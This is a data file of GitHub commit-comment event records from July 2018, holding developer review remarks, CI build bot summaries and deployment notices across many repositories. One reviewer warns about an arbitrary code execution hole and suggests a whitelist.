{"id":"7945925271","type":"CommitCommentEvent","actor":{"login":"safwank"},"repo":{"name":"safwank/ElixirRetry"},"payload":{"comment":{"id":29661944,"position":null,"line":null,"path":null,"commit_id":"5132f1135f3c2bd34db70c4dacecee0c74ccef4b","created_at":"2018-07-10T19:34:15Z","updated_at":"2018-07-10T19:34:15Z","author_association":"OWNER","body":"https://semver.org/#spec-item-8\r\n\r\nMajor version X (X.y.z | **X > 0**) MUST be incremented if any backwards incompatible changes are introduced to the public API. It MAY include minor and patch level changes. Patch and minor version MUST be reset to 0 when major version is incremented."}},"created_at":"2018-07-10T19:34:15Z"}
{"id":"7945927760","type":"CommitCommentEvent","actor":{"login":"CharliePoole"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":29661949,"position":null,"line":null,"path":null,"commit_id":"2e19b4e99144ce1c9437b4e9a03987987b9aaf64","created_at":"2018-07-10T19:34:44Z","updated_at":"2018-07-10T19:34:44Z","author_association":"MEMBER","body":"@jnm2 Re: `#define`\r\n\r\nOlder versions of C# allowed it but it didn't work as you would expect. That is, the nested `#if` statements would take effect all the time, whether the initial constant was defined or not.\r\n\r\nLater versions didn't allow defines after you had used anything else in the file.\r\n\r\nYour example does note that it's a new feature to support, which I'm definitely in favor of."}},"created_at":"2018-07-10T19:34:44Z"}
{"id":"7945928909","type":"CommitCommentEvent","actor":{"login":"devinreams"},"repo":{"name":"mozillach/mozilla-watcher"},"payload":{"comment":{"id":29661951,"position":null,"line":null,"path":null,"commit_id":"deee5cf72c445a04dd308153d6cc83c83d3ab841","created_at":"2018-07-10T19:35:00Z","updated_at":"2018-07-10T19:35:00Z","author_association":"NONE","body":"Thanks @freaktechnik 🙇 "}},"created_at":"2018-07-10T19:35:00Z"}
{"id":"7945929910","type":"CommitCommentEvent","actor":{"login":"mcewenma"},"repo":{"name":"mcewenma/FirstGitRepository"},"payload":{"comment":{"id":29661954,"position":null,"line":null,"path":null,"commit_id":"1a0a9a44919bf5303d0c99df6158b42ecbcc1c74","created_at":"2018-07-10T19:35:13Z","updated_at":"2018-07-10T19:35:13Z","author_association":"OWNER","body":"First repository and first comment for this repository."}},"created_at":"2018-07-10T19:35:13Z"}
{"id":"7945931125","type":"CommitCommentEvent","actor":{"login":"andysgithub"},"repo":{"name":"SmartArduino/ESPboard"},"payload":{"comment":{"id":29661955,"position":null,"line":null,"path":null,"commit_id":"bb8ab2bc9536b39fb16bb1d5ebc65fea9d4f7026","created_at":"2018-07-10T19:35:27Z","updated_at":"2018-07-10T19:35:27Z","author_association":"NONE","body":"Will an English version of this manual be available soon?"}},"created_at":"2018-07-10T19:35:27Z"}
{"id":"7945936403","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29661967,"position":null,"line":null,"path":null,"commit_id":"f68b858702c492251262d8785e390004942a3b55","created_at":"2018-07-10T19:36:36Z","updated_at":"2018-07-10T19:36:36Z","author_association":"NONE","body":"158913899-Add-single-sided-natural-ventilation-example-file (lgu1234) - x86_64-MacOS-10.9-clang: OK (2932 of 2933 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 623\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f68b858702c492251262d8785e390004942a3b55-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f68b858702c492251262d8785e390004942a3b55-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-10T19:36:36Z"}
{"id":"7945938649","type":"CommitCommentEvent","actor":{"login":"eolivelli"},"repo":{"name":"apache/bookkeeper"},"payload":{"comment":{"id":29661971,"position":97,"line":365,"path":"bookkeeper-server/src/test/java/org/apache/bookkeeper/bookie/IndexPersistenceMgrTest.java","commit_id":"20cd0b4425b45706dd13cd4f12963303d5c3bea7","created_at":"2018-07-10T19:37:04Z","updated_at":"2018-07-10T19:37:04Z","author_association":"CONTRIBUTOR","body":"Why do we have to use a 'while', can't we know the exact number of refs?"}},"created_at":"2018-07-10T19:37:04Z"}
{"id":"7945938831","type":"CommitCommentEvent","actor":{"login":"sigal"},"repo":{"name":"diddipoeler/sportsmanagement"},"payload":{"comment":{"id":29661972,"position":4,"line":5534,"path":"admin/language/de-DE/de-DE.com_sportsmanagement.ini","commit_id":"06579b19d240c85eaf1b978b6b7db47ab8748f24","created_at":"2018-07-10T19:37:07Z","updated_at":"2018-07-10T19:37:07Z","author_association":"CONTRIBUTOR","body":"Zeile 5277 + 5278 (RANKING)"}},"created_at":"2018-07-10T19:37:07Z"}
{"id":"7945939444","type":"CommitCommentEvent","actor":{"login":"John-Luke"},"repo":{"name":"RPCS3/rpcs3"},"payload":{"comment":{"id":29661973,"position":4,"line":143,"path":"rpcs3/Emu/Cell/Modules/cellGame.cpp","commit_id":"317698a15bd4a2cf849552d57a71418cd4622ace","created_at":"2018-07-10T19:37:14Z","updated_at":"2018-07-10T19:37:14Z","author_association":"NONE","body":"Oh, I'm sorry. I don't know this.\r\n\r\nI think these alternatives can be done in core:\r\n  https://www.systutorials.com/136585/how-to-get-available-filesystem-space-on-linux-a-c-function-and-a-cpp-example/\r\n  https://docs.microsoft.com/pt-br/windows/desktop/api/fileapi/nf-fileapi-getdiskfreespaceexa"}},"created_at":"2018-07-10T19:37:14Z"}
{"id":"7945940861","type":"CommitCommentEvent","actor":{"login":"Lomilar"},"repo":{"name":"cassproject/cass-editor"},"payload":{"comment":{"id":29661974,"position":null,"line":null,"path":null,"commit_id":"2352226a75b7d5f1b19ed7b4e8d733801a7f69ee","created_at":"2018-07-10T19:37:33Z","updated_at":"2018-07-10T19:37:33Z","author_association":"MEMBER","body":"Fixed #338 here as well."}},"created_at":"2018-07-10T19:37:33Z"}
{"id":"7945944270","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29661984,"position":null,"line":null,"path":null,"commit_id":"6fd30f53dc0d1836dcea26382c4e027f8200f182","created_at":"2018-07-10T19:38:17Z","updated_at":"2018-07-10T19:38:17Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-323](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-323).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-323-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-10T19:38:17Z"}
{"id":"7945947581","type":"CommitCommentEvent","actor":{"login":"jobizzness"},"repo":{"name":"jobizzness/visiting-gambia"},"payload":{"comment":{"id":29661988,"position":null,"line":null,"path":null,"commit_id":"bbcfbe88793fab9ed0d540e0eec437a7838c9479","created_at":"2018-07-10T19:39:01Z","updated_at":"2018-07-10T19:39:01Z","author_association":"OWNER","body":"Seen"}},"created_at":"2018-07-10T19:39:01Z"}
{"id":"7945947600","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29661989,"position":null,"line":null,"path":null,"commit_id":"4afb6a7cc0d84ccdaed29031a1a283532a41f090","created_at":"2018-07-10T19:39:01Z","updated_at":"2018-07-10T19:39:01Z","author_association":"NONE","body":"158922394_Issue#4431 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2311 of 2312 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 627\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4afb6a7cc0d84ccdaed29031a1a283532a41f090-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4afb6a7cc0d84ccdaed29031a1a283532a41f090-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4afb6a7cc0d84ccdaed29031a1a283532a41f090-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-10T19:39:01Z"}
{"id":"7945953577","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29661998,"position":null,"line":null,"path":null,"commit_id":"4afb6a7cc0d84ccdaed29031a1a283532a41f090","created_at":"2018-07-10T19:40:23Z","updated_at":"2018-07-10T19:40:23Z","author_association":"NONE","body":"158922394_Issue#4431 (Nigusse) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4afb6a7cc0d84ccdaed29031a1a283532a41f090-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-10T19:40:23Z"}
{"id":"7945965618","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/Redux-Todo"},"payload":{"comment":{"id":29662032,"position":null,"line":null,"path":null,"commit_id":"ecc2859777ded7126a2be075f055fa915e62ae3b","created_at":"2018-07-10T19:42:53Z","updated_at":"2018-07-10T19:42:53Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Todo - Initialize Project (MVP)](https://trello.com/c/E9X5hjgR/2-todo-initialize-project-mvp)"}},"created_at":"2018-07-10T19:42:53Z"}
{"id":"7945971060","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29662038,"position":null,"line":null,"path":null,"commit_id":"8533844d83e131403ea4764f779c417c45d8c44c","created_at":"2018-07-10T19:44:03Z","updated_at":"2018-07-10T19:44:03Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [updateappl](https://updateappl-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/application-containers](https://updateappl-static-docs.pantheonsite.io/docs/application-containers)\n"}},"created_at":"2018-07-10T19:44:03Z"}
{"id":"7945978433","type":"CommitCommentEvent","actor":{"login":"Varstahl"},"repo":{"name":"Varstahl/xbmc"},"payload":{"comment":{"id":29662056,"position":91,"line":91,"path":"plugin.video.amazon-test/resources/lib/startup.py","commit_id":"d3a0646e051df3e8ab78eed22d6e485e43f92935","created_at":"2018-07-10T19:45:37Z","updated_at":"2018-07-10T19:45:37Z","author_association":"OWNER","body":"@Sandmann79 this is ultra dangerous, as it allows arbitrary code execution, included from the outside with other addons. I tried to more or less sanitise parts of it, but we probably need **at least** a list of valid calls to check with, something like\r\n\r\n```python\r\nif mode in ['deleteUser','addUser',…]:\r\n  exec md\r\n```\r\n\r\nI barely used the function (if at all), and I didn't want to break everything, but you should probably check it out in the upcoming PR/merge, we should definitely patch this wide hole."}},"created_at":"2018-07-10T19:45:37Z"}
{"id":"7945978500","type":"CommitCommentEvent","actor":{"login":"peti"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29662057,"position":5,"line":76,"path":"pkgs/top-level/haskell-packages.nix","commit_id":"c85f23a82a6ae9a5b38a789897e455b11983e528","created_at":"2018-07-10T19:45:38Z","updated_at":"2018-07-10T19:45:38Z","author_association":"MEMBER","body":"The build needs ghc 8.2.2 or later. 8.2.1 is rejected by the configure stage."}},"created_at":"2018-07-10T19:45:38Z"}
{"id":"7945985095","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29662074,"position":null,"line":null,"path":null,"commit_id":"208de57160d7a8df84ed918b2b7f017a17617ac0","created_at":"2018-07-10T19:47:04Z","updated_at":"2018-07-10T19:47:04Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [jfussionfi](https://jfussionfi-static-docs.pantheonsite.io/docs) Multidev environment:\n- [source/_partials/content/d7-composer-init.html](https://github.com/pantheon-systems/documentation/commit/208de57160d7a8df84ed918b2b7f017a17617ac0/source/_partials/content/d7-composer-init.html)\n"}},"created_at":"2018-07-10T19:47:04Z"}
{"id":"7945990207","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29662085,"position":null,"line":null,"path":null,"commit_id":"8e299231ae22b084b442c498ef8b07ccfd313cf1","created_at":"2018-07-10T19:48:15Z","updated_at":"2018-07-10T19:48:15Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-MacOS-10.9-clang: OK (2309 of 2309 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8e299231ae22b084b442c498ef8b07ccfd313cf1-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8e299231ae22b084b442c498ef8b07ccfd313cf1-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-10T19:48:15Z"}
{"id":"7945990937","type":"CommitCommentEvent","actor":{"login":"pbombina"},"repo":{"name":"bpames/Densest-Submatrix-Paper"},"payload":{"comment":{"id":29662086,"position":null,"line":null,"path":null,"commit_id":"e7177102b51fbd681be4acbaa7fca14f5ae3e2a6","created_at":"2018-07-10T19:48:25Z","updated_at":"2018-07-10T19:48:25Z","author_association":"COLLABORATOR","body":"Do I need to leave this proof right after the THM or in Appendix? "}},"created_at":"2018-07-10T19:48:25Z"}
{"id":"7945991607","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29662088,"position":null,"line":null,"path":null,"commit_id":"286587a3b56247392258ac0371846221ac3e85ae","created_at":"2018-07-10T19:48:34Z","updated_at":"2018-07-10T19:48:34Z","author_association":"NONE","body":"develop (mbadams5) - i386-Windows-7-VisualStudio-14: OK (2308 of 2308 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-286587a3b56247392258ac0371846221ac3e85ae-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-286587a3b56247392258ac0371846221ac3e85ae-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-10T19:48:34Z"}
{"id":"7945996353","type":"CommitCommentEvent","actor":{"login":"darkiop"},"repo":{"name":"darkiop/ioBroker.backitup"},"payload":{"comment":{"id":29662099,"position":null,"line":null,"path":null,"commit_id":"25acf00381a3515129b2f7a3c8192a9a3260f5d9","created_at":"2018-07-10T19:49:37Z","updated_at":"2018-07-10T19:49:37Z","author_association":"OWNER","body":"Mit den Leerzeichen gibt es eine *.sql Datei mit 0 bytes - vermutlich wird das Passwort im Befehl nicht akzeptiert. Mysqldump ist da wohl etwas speziell - ohne den Leerzeichen gibt es keine Probleme."}},"created_at":"2018-07-10T19:49:37Z"}
{"id":"7945996946","type":"CommitCommentEvent","actor":{"login":"alexcbluk"},"repo":{"name":"alexcbluk/hello-world"},"payload":{"comment":{"id":29662102,"position":null,"line":null,"path":null,"commit_id":"5ad4dfd87596cacb01481a7fdb43f886260c10e7","created_at":"2018-07-10T19:49:44Z","updated_at":"2018-07-10T19:49:44Z","author_association":"OWNER","body":"I see that I have removed the phrase \"-Hoooray for a new banch!\""}},"created_at":"2018-07-10T19:49:44Z"}
{"id":"7946000959","type":"CommitCommentEvent","actor":{"login":"reddycharan"},"repo":{"name":"apache/bookkeeper"},"payload":{"comment":{"id":29662116,"position":97,"line":365,"path":"bookkeeper-server/src/test/java/org/apache/bookkeeper/bookie/IndexPersistenceMgrTest.java","commit_id":"20cd0b4425b45706dd13cd4f12963303d5c3bea7","created_at":"2018-07-10T19:50:37Z","updated_at":"2018-07-10T19:50:37Z","author_association":"NONE","body":"this makes things simpler and easy to understand, instead of finding current refcount and releasing so many number of times."}},"created_at":"2018-07-10T19:50:37Z"}
{"id":"7946001572","type":"CommitCommentEvent","actor":{"login":"GamiiisKth"},"repo":{"name":"GamiiisKth/lcoco-toolchain"},"payload":{"comment":{"id":29662117,"position":null,"line":null,"path":null,"commit_id":"5442984b5635a23e2be6a6df27ebd6c93ddad305","created_at":"2018-07-10T19:50:46Z","updated_at":"2018-07-10T19:50:46Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/0b5461dc-e7b0-4d4e-b1d1-dae514c45f9f?env_id=ibm%3Ayp%3Aeu-de \"lcoco-toolchain\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/668c7960-990d-4b62-bc8c-ffc62eb11a13?env_id=ibm%3Ayp%3Aeu-de \"lcoco-toolchain\") deployed [lcoco-toolchain](https://github.com/GamiiisKth/lcoco-toolchain/releases/tag/deploy-ibm-yp-eu-de-admin-lcoco.se-dev-20180710-195045 \"deploy-ibm-yp-eu-de-admin-lcoco.se-dev-20180710-195045\") to [dev](https://console.bluemix.net/apps/b456ddc6-614f-4d70-adda-a392af995101?env_id=ibm:yp:eu-de \"ibm:yp:eu-de:admin@lcoco.se:dev\"), including this commit"}},"created_at":"2018-07-10T19:50:46Z"}
{"id":"7946002848","type":"CommitCommentEvent","actor":{"login":"jonashen"},"repo":{"name":"rlworkgroup/garage"},"payload":{"comment":{"id":29662121,"position":14,"line":30,"path":"garage/tf/algos/npo.py","commit_id":"fc9680b567045fc4624edba9e69243759b675c7d","created_at":"2018-07-10T19:51:05Z","updated_at":"2018-07-10T19:51:05Z","author_association":"MEMBER","body":"self._name_scope?"}},"created_at":"2018-07-10T19:51:05Z"}
{"id":"7946003818","type":"CommitCommentEvent","actor":{"login":"MPiwowarski"},"repo":{"name":"Jozin1987/tests"},"payload":{"comment":{"id":29662124,"position":29,"line":30,"path":"StockMarket/Program.cs","commit_id":"95bd47440047493d26552772c4650396d2a9fbc0","created_at":"2018-07-10T19:51:17Z","updated_at":"2018-07-10T19:51:17Z","author_association":"NONE","body":"The 2nd result of the program is wrong.\r\nThe proper answer is: buy on day 20th for price 15.79 and sell on day 21st for 26.19.\r\nYou need to make an investigation on the implementation of your algorithm\r\nand I suggest creating more unit tests."}},"created_at":"2018-07-10T19:51:17Z"}
{"id":"7946004468","type":"CommitCommentEvent","actor":{"login":"shepmaster"},"repo":{"name":"jeremyBanks/0dmg"},"payload":{"comment":{"id":29662127,"position":5,"line":26,"path":"zerodmg-codes/src/lib.rs","commit_id":"bb8520a78e27d794c5644aac884f929d68da4e43","created_at":"2018-07-10T19:51:27Z","updated_at":"2018-07-10T19:51:27Z","author_association":"NONE","body":"Where's the method to allow writing to this ROM?"}},"created_at":"2018-07-10T19:51:27Z"}
{"id":"7946006248","type":"CommitCommentEvent","actor":{"login":"jonashen"},"repo":{"name":"rlworkgroup/garage"},"payload":{"comment":{"id":29662129,"position":13,"line":19,"path":"garage/tf/distributions/bernoulli.py","commit_id":"fc9680b567045fc4624edba9e69243759b675c7d","created_at":"2018-07-10T19:51:52Z","updated_at":"2018-07-10T19:51:52Z","author_association":"MEMBER","body":"I think you need to pass in values to name_scope, i.e. `tf.name_scope(name, [old_dist_info_vars, new_dist_info_vars])`"}},"created_at":"2018-07-10T19:51:52Z"}
{"id":"7946007822","type":"CommitCommentEvent","actor":{"login":"johnsonw"},"repo":{"name":"whamcloud/iml-update-check"},"payload":{"comment":{"id":29662131,"position":34,"line":34,"path":"handler.js","commit_id":"c70abb8cf592047bea4d4d6b3418d53d054725b3","created_at":"2018-07-10T19:52:14Z","updated_at":"2018-07-10T19:52:14Z","author_association":"NONE","body":"console.error?"}},"created_at":"2018-07-10T19:52:14Z"}
{"id":"7946012959","type":"CommitCommentEvent","actor":{"login":"johnsonw"},"repo":{"name":"whamcloud/iml-update-check"},"payload":{"comment":{"id":29662135,"position":1,"line":1,"path":"handler.js","commit_id":"c70abb8cf592047bea4d4d6b3418d53d054725b3","created_at":"2018-07-10T19:53:21Z","updated_at":"2018-07-10T19:53:21Z","author_association":"NONE","body":"Any reason we are using js and not fable?"}},"created_at":"2018-07-10T19:53:21Z"}
{"id":"7946013708","type":"CommitCommentEvent","actor":{"login":"jonashen"},"repo":{"name":"rlworkgroup/garage"},"payload":{"comment":{"id":29662139,"position":22,"line":45,"path":"garage/tf/distributions/bernoulli.py","commit_id":"fc9680b567045fc4624edba9e69243759b675c7d","created_at":"2018-07-10T19:53:32Z","updated_at":"2018-07-10T19:53:32Z","author_association":"MEMBER","body":"same here"}},"created_at":"2018-07-10T19:53:32Z"}
{"id":"7946013977","type":"CommitCommentEvent","actor":{"login":"jonashen"},"repo":{"name":"rlworkgroup/garage"},"payload":{"comment":{"id":29662141,"position":31,"line":58,"path":"garage/tf/distributions/bernoulli.py","commit_id":"fc9680b567045fc4624edba9e69243759b675c7d","created_at":"2018-07-10T19:53:36Z","updated_at":"2018-07-10T19:53:36Z","author_association":"MEMBER","body":"and here"}},"created_at":"2018-07-10T19:53:36Z"}
{"id":"7946014660","type":"CommitCommentEvent","actor":{"login":"thisisdano"},"repo":{"name":"18F/18franklin"},"payload":{"comment":{"id":29662143,"position":2,"line":1,"path":"CONTRIBUTING.md","commit_id":"423550a375010037714ef2083d0cde6ae4eaf542","created_at":"2018-07-10T19:53:46Z","updated_at":"2018-07-10T19:53:46Z","author_association":"MEMBER","body":"Eeesh. Thanks @fitojb And it's Tal Lemming too, a hero. Luckily, this face is still an internal thing and unreleased. The next name will get some more due diligence. Thanks for the heads up and sorry this languished in some unchecked pile of github comments for so long..."}},"created_at":"2018-07-10T19:53:46Z"}
{"id":"7946023454","type":"CommitCommentEvent","actor":{"login":"silmasur"},"repo":{"name":"silmasur/proyectos.silmasur.xyz"},"payload":{"comment":{"id":29662154,"position":5,"line":6,"path":"index.html","commit_id":"f3ac3504712e7153f872d157a534af0565d3ffdb","created_at":"2018-07-10T19:55:43Z","updated_at":"2018-07-10T19:55:43Z","author_association":"OWNER","body":"cmment"}},"created_at":"2018-07-10T19:55:43Z"}
{"id":"7946024463","type":"CommitCommentEvent","actor":{"login":"silmasur"},"repo":{"name":"silmasur/proyectos.silmasur.xyz"},"payload":{"comment":{"id":29662156,"position":4,"line":6,"path":"index.html","commit_id":"f3ac3504712e7153f872d157a534af0565d3ffdb","created_at":"2018-07-10T19:55:56Z","updated_at":"2018-07-10T19:55:56Z","author_association":"OWNER","body":"hy"}},"created_at":"2018-07-10T19:55:56Z"}
{"id":"7946024832","type":"CommitCommentEvent","actor":{"login":"Tafoid"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29662158,"position":null,"line":null,"path":null,"commit_id":"f77220d24d3898ebb18b623aed4f47ff1644b6f8","created_at":"2018-07-10T19:56:01Z","updated_at":"2018-07-10T19:56:01Z","author_association":"CONTRIBUTOR","body":"mtrainnv - subsino.cpp\r\nFatal error: NVRAM device ':nvram' has no corresponding AM_SHARE region"}},"created_at":"2018-07-10T19:56:01Z"}
{"id":"7946029511","type":"CommitCommentEvent","actor":{"login":"Galarzaa90"},"repo":{"name":"Galarzaa90/NabBot"},"payload":{"comment":{"id":29662160,"position":null,"line":null,"path":null,"commit_id":"fe0ac1535766d3186daa354ac0e4c548c59c0bc9","created_at":"2018-07-10T19:57:02Z","updated_at":"2018-07-10T19:57:02Z","author_association":"OWNER","body":"Thanks @Nezune "}},"created_at":"2018-07-10T19:57:02Z"}
{"id":"7946034317","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29662166,"position":null,"line":null,"path":null,"commit_id":"207158531e97fac46cfaa6a46c66601e4b30fbf9","created_at":"2018-07-10T19:58:00Z","updated_at":"2018-07-10T19:58:00Z","author_association":"COLLABORATOR","body":"I've started adding a scope to `DataDefinition` in the [ddScope](https://github.com/JacquesCarette/Drasil/tree/ddScope) branch; is there an example of a \"local\" data definition I can look up from our examples? Asking because the `QDefinition`s I've gone through look like \"global definitions\" since they are called pretty much from anywhere within the SRS."}},"created_at":"2018-07-10T19:58:00Z"}
{"id":"7946037661","type":"CommitCommentEvent","actor":{"login":"sdumitriu"},"repo":{"name":"phenotips/clinical-text-analysis-extension"},"payload":{"comment":{"id":29662168,"position":null,"line":null,"path":null,"commit_id":"f31b93b9ba1bebb177e3f926635e65fc3292c169","created_at":"2018-07-10T19:58:40Z","updated_at":"2018-07-10T19:58:40Z","author_association":"MEMBER","body":"Reverted."}},"created_at":"2018-07-10T19:58:40Z"}
{"id":"7946037701","type":"CommitCommentEvent","actor":{"login":"johnsonw"},"repo":{"name":"whamcloud/iml-update-check"},"payload":{"comment":{"id":29662169,"position":5,"line":5,"path":"handler.js","commit_id":"c70abb8cf592047bea4d4d6b3418d53d054725b3","created_at":"2018-07-10T19:58:41Z","updated_at":"2018-07-10T19:58:41Z","author_association":"NONE","body":"If we are going to use javascript we should probably use es6 style imports:\r\n```\r\nimport { createServer } from 'http';\r\n```"}},"created_at":"2018-07-10T19:58:41Z"}
{"id":"7946041685","type":"CommitCommentEvent","actor":{"login":"MPiwowarski"},"repo":{"name":"Jozin1987/tests"},"payload":{"comment":{"id":29662176,"position":14,"line":14,"path":"StockMarket/Repositories/StockMarketRepository.cs","commit_id":"95bd47440047493d26552772c4650396d2a9fbc0","created_at":"2018-07-10T19:59:30Z","updated_at":"2018-07-10T19:59:30Z","author_association":"NONE","body":"Why do you allow to pass null? I would suggest using int. In more complex case you could even use an enum to enforce the user to pick an option from your list. In your switch/default I would return an empty collection or throw an exception. "}},"created_at":"2018-07-10T19:59:30Z"}
{"id":"7946043091","type":"CommitCommentEvent","actor":{"login":"prusnak"},"repo":{"name":"trezor/trezor-mcu"},"payload":{"comment":{"id":29662180,"position":45,"line":158,"path":"firmware/stellar.c","commit_id":"520cd69f25e4f34504ea03897ee2b6b3242e75e9","created_at":"2018-07-10T19:59:49Z","updated_at":"2018-07-10T19:59:49Z","author_association":"MEMBER","body":"@zulucrypto thanks for the explanation, reverted the changes"}},"created_at":"2018-07-10T19:59:49Z"}
{"id":"7941037884","type":"CommitCommentEvent","actor":{"login":"esmth"},"repo":{"name":"agsimmons/Minesweeper"},"payload":{"comment":{"id":29650148,"position":null,"line":null,"path":null,"commit_id":"946f020b6e5beae03523354c56c0baba41997707","created_at":"2018-07-10T02:04:07Z","updated_at":"2018-07-10T02:04:07Z","author_association":"COLLABORATOR","body":"nice i didn't know that could be done"}},"created_at":"2018-07-10T02:04:07Z"}
{"id":"7941041751","type":"CommitCommentEvent","actor":{"login":"hococoder"},"repo":{"name":"raywenderlich/SC_JoshSteele"},"payload":{"comment":{"id":29650153,"position":null,"line":null,"path":null,"commit_id":"11d4b2256637dbe782c90cbda7d670f86848b310","created_at":"2018-07-10T02:05:34Z","updated_at":"2018-07-10T02:05:34Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [July 5, 12, 19 | Password AutoFill (3 Screencasts)](https://trello.com/c/s7O1lBzb/43-july-5-12-19-password-autofill-3-screencasts)"}},"created_at":"2018-07-10T02:05:34Z"}
{"id":"7941042031","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"mellery451/rippled"},"payload":{"comment":{"id":29650154,"position":null,"line":null,"path":null,"commit_id":"2477262c5338bc834330e642b219cff74195f971","created_at":"2018-07-10T02:05:40Z","updated_at":"2018-07-10T02:05:40Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/mellery451/rippled/commit/2477262c5338bc834330e642b219cff74195f971)\n\nBuilt at __20180710 - 02:05:40__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nrpm | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/6//artifact/rpm.txt) | 1034 cases, 0 failed, t: n/a | PASS :white_check_mark: \nmsvc.debug | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/6//artifact/msvc.debug.txt) | 1032 cases, 0 failed, t: 568s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/6//artifact/gcc.release.unity_Dassert_true_MANUAL_TESTS_true.txt) | 1101 cases, 0 failed, t: 797s | PASS :white_check_mark: \ndocs | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/6//artifact/docs.txt) | 1 cases, 0 failed, t: 3s | PASS :white_check_mark: \ncoverage | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/6//artifact/coverage.txt) | 1035 cases, 0 failed, t: 691s | PASS :white_check_mark: \nclang.debug.unity | 